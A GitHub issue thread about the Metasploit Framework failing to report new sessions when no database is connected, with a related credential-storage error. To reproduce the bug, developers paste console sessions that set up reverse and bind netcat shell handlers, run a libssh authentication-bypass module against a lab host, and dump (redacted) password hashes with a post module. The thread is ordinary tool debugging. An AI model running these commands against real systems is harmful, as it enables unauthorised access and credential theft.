Metasploit-framework: Metasploit no longer reports when it receives a session
I noticed starting about a week ago that Metasploit no longer reports when it receives a session.
At first this wasn't an issue, as I was testing a staged payload, so Sending stage (x bytes) in console was a dead give away.
However, it's a problem. Observe:
msf5 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.1.1.197:1337
id
uid=501(qq) gid=20(staff) groups=20(staff),401(com.apple.access_screensharing),12(everyone),33(_appstore),61(localaccounts),79(_appserverusr),80(admin),81(_appserveradm),98(_lpadmin),100(_lpoperator),204(_developer),402(com.apple.sharepoint.group.1)
^C
Abort session 4? [y/N] y
Had I not noticed the carriage return / line feed come through, I would not be aware a session was returned.
Fortunately, attempting to CTRL+C the running handler reveals the presence of a session. Observe:
msf5 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.1.1.197:1337
^C
Abort session 5? [y/N]
I've performed no root cause analysis and don't intend to. At the time, I remember thinking 2c92e854942b24f3448acee1fe04a9b961a6c099 was the obvious culprit, but have not verified.
bcoles
All 16 comments
I've seen this once before (months ago) but I could not find a way to reliably reproduce it.
timwr
on 4 Jun 2018
I found that in msf5 too.
Green-m
on 4 Jun 2018
Always reproducible. Kali 1.0.6. Ruby 2.3.0. Metasploit5 from github.
bcoles
on 4 Jun 2018
I can't reproduce on Ubuntu, Ruby 2.3.0, f1701ecc93
@Green-m is it always occurring for you? Can you share your setup?
timwr
on 4 Jun 2018
bcoles
on 4 Jun 2018
env:
$ uname -a
Linux kali 4.6.0-kali1-amd64 #1 SMP Debian 4.6.4-1kali1 (2016-07-21) x86_64 GNU/Linux
$ ruby -v
ruby 2.5.1p57 (2018-03-29 revision 63029) [x86_64-linux]
$ ./msfconsole -v
Framework Version: 5.0.0-dev-a3ccf2ba90
Green-m
on 4 Jun 2018
Still an issue.
msf5 exploit(multi/handler) > set payload cmd/unix/bind_netcat
payload => cmd/unix/bind_netcat
msf5 exploit(multi/handler) > set lport 1337
lport => 1337
msf5 exploit(multi/handler) > run
[*] Started bind handler
id
uid=0(root) gid=0(root) groups=0(root)
I wonder if it has to do with threading. I know in some languages output occurring on background threads doesn't show up in the foreground thread even if a mutex is used to lock the resource so it's guaranteed available. Would need to try to figure out where in the code this output normally comes from though to get begin looking into it
kkirsche
on 16 Aug 2018
This appears to be related to the database. When no database is connected, Metasploit does not report new sessions.
As an aside, if you get a session, then start the database, then run a post module that makes use of the database, then Metasploit will complain Session can't be blank when it tries to store the data.
[-] Post failed: Exception Problem creating credential: Validation failed: Session can't be blank. See log for more details.
[-] Call stack:
[-] /pentest/exploit/metasploit-framework/lib/metasploit/framework/data_service/proxy/core.rb:158:in `log_error'
[-] /pentest/exploit/metasploit-framework/lib/metasploit/framework/data_service/proxy/credential_data_proxy.rb:8:in `rescue in create_credential'
[-] /pentest/exploit/metasploit-framework/lib/metasploit/framework/data_service/proxy/credential_data_proxy.rb:4:in `create_credential'
[-] /pentest/exploit/metasploit-framework/lib/msf/core/auxiliary/report.rb:34:in `create_credential'
[-] /pentest/exploit/metasploit-framework/modules/post/solaris/escalate/srsexec_readline.rb:105:in `run'
[*] Post module execution completed
👍1
timwr
on 22 Oct 2018
Yup. Still an issue.
bcoles
on 22 Oct 2018
I still can't reproduce it. Let me try on Kali
timwr
on 22 Oct 2018
Confirmed on my end when running with no database:
wvu@kharak:~/metasploit-framework:master$ ./msfconsole -nq
[-] ***
[-] * WARNING: Database support has been disabled
[-] ***
msf5 > version
Framework: 5.0.0-dev-c6cb6ce2f3
Console : 5.0.0-dev-c6cb6ce2f3
msf5 > use auxiliary/scanner/ssh/libssh_auth_bypass
msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > set rhosts 172.28.128.3
rhosts => 172.28.128.3
msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > set rport 2222
rport => 2222
msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > set spawn_pty true
spawn_pty => true
msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > set verbose true
verbose => true
msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > run
[*] 172.28.128.3:2222 - Attempting authentication bypass
[+] 172.28.128.3:2222 - SSH-2.0-libssh_0.8.3 appears to be unpatched
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell libssh Authentication Bypass Scanner (SSH-2.0-libssh_0.8.3) 172.28.128.1:61153 -> 172.28.128.3:2222 (172.28.128.3)
msf5 auxiliary(scanner/ssh/libssh_auth_bypass) >
For the record, this is a known core issue and not a module issue.
10820
wvu-r7
on 22 Oct 2018
I think I have found the reason and would fix this tomorrow!
Green-m
on 23 Oct 2018
🎉5
See #10862
Green-m
on 24 Oct 2018
This appears to be related to the database. When no database is connected, Metasploit does not report new sessions.
As an aside, if you get a session, then start the database, then run a post module that makes use of the database, then Metasploit will complain
Session can't be blankwhen it tries to store the data.[-] Post failed: Exception Problem creating credential: Validation failed: Session can't be blank. See log for more details. [-] Call stack: [-] /pentest/exploit/metasploit-framework/lib/metasploit/framework/data_service/proxy/core.rb:158:in `log_error' [-] /pentest/exploit/metasploit-framework/lib/metasploit/framework/data_service/proxy/credential_data_proxy.rb:8:in `rescue in create_credential' [-] /pentest/exploit/metasploit-framework/lib/metasploit/framework/data_service/proxy/credential_data_proxy.rb:4:in `create_credential' [-] /pentest/exploit/metasploit-framework/lib/msf/core/auxiliary/report.rb:34:in `create_credential' [-] /pentest/exploit/metasploit-framework/modules/post/solaris/escalate/srsexec_readline.rb:105:in `run' [*] Post module execution completed
It looks like the second part of this issue wasn't fixed. The [-] Post failed: RuntimeError Problem creating credential: Validation failed: Session can't be blank. See log for more details. error is still thrown if the database is connected after receiving a session.
root@kali:/pentest/exploit/metasploit-framework# ./msfconsole -x "use exploit/multi/handler ; set payload linux/x64/meterpreter/reverse_tcp ; set lhost 172.16.191.188 ; set lport 1337 ; set exitonsession false ; run -jz; set payload cmd/unix/reverse_netcat; set lport 1338; run -jz"
[-] ***rtiNg the Metasploit Framework console...-
[-] * WARNING: No database support: No database YAML file
[-] ***
01010001000011011101000111011001101000001101001001
01000100100100011100100000000000001000100000000000
01110000000000011101010000101000001010110000010010
00000010000000011100001001110110000011000000000000
01000001000101101001000111110101001011001000100000
00010000100110101001101011000010010110001000100000
00000111110010111110001011011001111001001001010000
00110000010001111100100011011000111100010011000000
00000001101110011111100011011010110011100100000011
00000000000101111001101011011011001110000001001100
00000000001010111101100111010111111011100000000000
01100010000011010011101000001001111011000000100111
00000000011000010011101011101011111110011111000000
10100000001101111100011111111100100001110000000000
00011100000000110110101011111110111000000000000000
10000000000000000001011111111100000000000111111111
00000010000100000000000111110000010000100000000000
00011011010000000100000100000000100000000111001100
00000011010111000111001010001001101101010111000000
00000001110000000000100010001110100000011100000110
00011100111010000011110000001111100011111100111000
00000000000111011100000010000000011111100000000000
00000000000111111111101010000011111111100000000000
00000000000001111001001010000001111010000000000000
00000000000000110110001100101000111010000000001110
00000000000000011101100010000011111100000000000000
11110000000100000100001000000000010000111100111100
00000000000000000000000110000000000110100000001000
00000011100000001110010000000100010000011001000000
10000110000000000000001000000000000100000001000010
00000000000001000001000000000000010001110000000001
00000000000000001110001110111100000000000111000000
01000000001000011010000001110000001000000000000000
00000000000000100000000000000000000001000000000000
Look at you, hacker:
a pathetic creature of meat and bone,
panting and sweating as you run through my corridors.
How can you challenge a perfect, immortal machine?
=[ metasploit v5.0.2-dev-e98c4ae ]
+ -- --=[ 1869 exploits - 1051 auxiliary - 322 post ]
+ -- --=[ 541 payloads - 44 encoders - 10 nops ]
+ -- --=[ 2 evasion ]
+ -- --=[ ** This is Metasploit 5 development branch ** ]
payload => linux/x64/meterpreter/reverse_tcp
lhost => 172.16.191.188
lport => 1337
exitonsession => false
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
payload => cmd/unix/reverse_netcat
lport => 1338
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 172.16.191.188:1337
[*] Started reverse TCP handler on 172.16.191.188:1338
msf5 exploit(multi/handler) > [*] Command shell session 1 opened (172.16.191.188:1338 -> 172.16.191.188:52717) at 2019-01-19 22:31:52 -0500
msf5 exploit(multi/handler) > db_connect msf:[email protected]:5432/msf
Connected to Postgres data service: 127.0.0.1/msf
msf5 exploit(multi/handler) > use post/linux/gather/hashdump
msf5 post(linux/gather/hashdump) > set session 1
session => 1
msf5 post(linux/gather/hashdump) > run
[!] SESSION may not be compatible with this module.
[-] Post failed: RuntimeError Problem creating credential: Validation failed: Session can't be blank. See log for more details.
[-] Call stack:
[-] /pentest/exploit/metasploit-framework/lib/metasploit/framework/data_service/proxy/core.rb:174:in `log_error'
[-] /pentest/exploit/metasploit-framework/lib/metasploit/framework/data_service/proxy/credential_data_proxy.rb:9:in `rescue in create_credential'
[-] /pentest/exploit/metasploit-framework/lib/metasploit/framework/data_service/proxy/credential_data_proxy.rb:4:in `create_credential'
[-] /pentest/exploit/metasploit-framework/lib/msf/core/auxiliary/report.rb:34:in `create_credential'
[-] /pentest/exploit/metasploit-framework/modules/post/linux/gather/hashdump.rb:48:in `block in run'
[-] /pentest/exploit/metasploit-framework/modules/post/linux/gather/hashdump.rb:35:in `each_line'
[-] /pentest/exploit/metasploit-framework/modules/post/linux/gather/hashdump.rb:35:in `run'
[*] Post module execution completed
msf5 post(linux/gather/hashdump) > sessions -K
[*] Killing all sessions...
[*] 172.16.191.188 - Command shell session 1 closed.
msf5 post(linux/gather/hashdump) > exit
root@kali:/pentest/exploit/metasploit-framework# ./msfconsole -x "use exploit/multi/handler ; set payload linux/x64/meterpreter/reverse_tcp ; set lhost 172.16.191.188 ; set lport 1337 ; set exitonsession false ; run -jz; set payload cmd/unix/reverse_netcat; set lport 1338; run -jz"
[-] ***rting thE Metasploit Framework console...\
[-] * WARNING: No database support: No database YAML file
[-] ***
_________________________________________________________
| |
| > QUERY FOR CLEARANCE |
| |
| .... |
| |
| ACCESS DENIED |
| |
| > INITIATE BATTERING RAM |
| |
| <A>NEV/HJS<KBA>(NET1=3V)MB1 -NK |
| (BEM)RAMJET/SYPHON -XP FUNCTIONS |
| TO SECONDRAY SYSTEMS {WATC} DEL SHA |
| --SOFTWARE OVERRIDE.... |
| |
| <P> PROGRAM - SYPHON/CIT |
| <C> MUTAGENIC RESARCH FILES/NES |
| TO-<B> SWITCH K*CODE/MEMORY ALPHA |
| NULL/NOID PROCESS0045 |
| |
| .... |
| |
| SECURITY SYSTEM DISABLED |
|_________________________________________________________|
=[ metasploit v5.0.2-dev-e98c4ae ]
+ -- --=[ 1869 exploits - 1051 auxiliary - 322 post ]
+ -- --=[ 541 payloads - 44 encoders - 10 nops ]
+ -- --=[ 2 evasion ]
+ -- --=[ ** This is Metasploit 5 development branch ** ]
payload => linux/x64/meterpreter/reverse_tcp
lhost => 172.16.191.188
lport => 1337
exitonsession => false
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
payload => cmd/unix/reverse_netcat
lport => 1338
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 172.16.191.188:1337
[*] Started reverse TCP handler on 172.16.191.188:1338
msf5 exploit(multi/handler) > db_connect msf:[email protected]:5432/msf
Connected to Postgres data service: 127.0.0.1/msf
msf5 exploit(multi/handler) > [*] Command shell session 1 opened (172.16.191.188:1338 -> 172.16.191.188:52736) at 2019-01-19 22:32:52 -0500
msf5 exploit(multi/handler) > use post/linux/gather/hashdump
msf5 post(linux/gather/hashdump) > set session 1
session => 1
msf5 post(linux/gather/hashdump) > run
[!] SESSION may not be compatible with this module.
[+] root:$6$<redacted>:0:0:root:/root:/bin/bash
[+] msf:$6$<redacted>:1000:1001:,,,:/home/msf:/bin/bash
[+] asdf:$6$<redacted>:1001:1003:,,,:/home/asdf:/bin/bash
[+] Unshadowed Password File: /root/.msf4/loot/20190119223258_default_172.16.191.188_linux.hashes_767117.txt
[*] Post module execution completed
msf5 post(linux/gather/hashdump) >
msf5 post(linux/gather/hashdump) > creds
Credentials
===========
host origin service public private realm private_type
---- ------ ------- ------ ------- ----- ------------
172.16.191.188 asdf $6$<redacted> Nonreplayable hash
172.16.191.188 root $6$<redacted> Nonreplayable hash
172.16.191.188 msf $6$<redacted> Nonreplayable hash
Was this page helpful?
0 / 5 - 0 ratings
Related issues
BaconBombz
路
3Comments
handsomebeast
路
3Comments
verapex
路
3Comments
wvu-r7
路
3Comments
wvu-r7
路
3Comments
Most helpful comment
I think I have found the reason and would fix this tomorrow!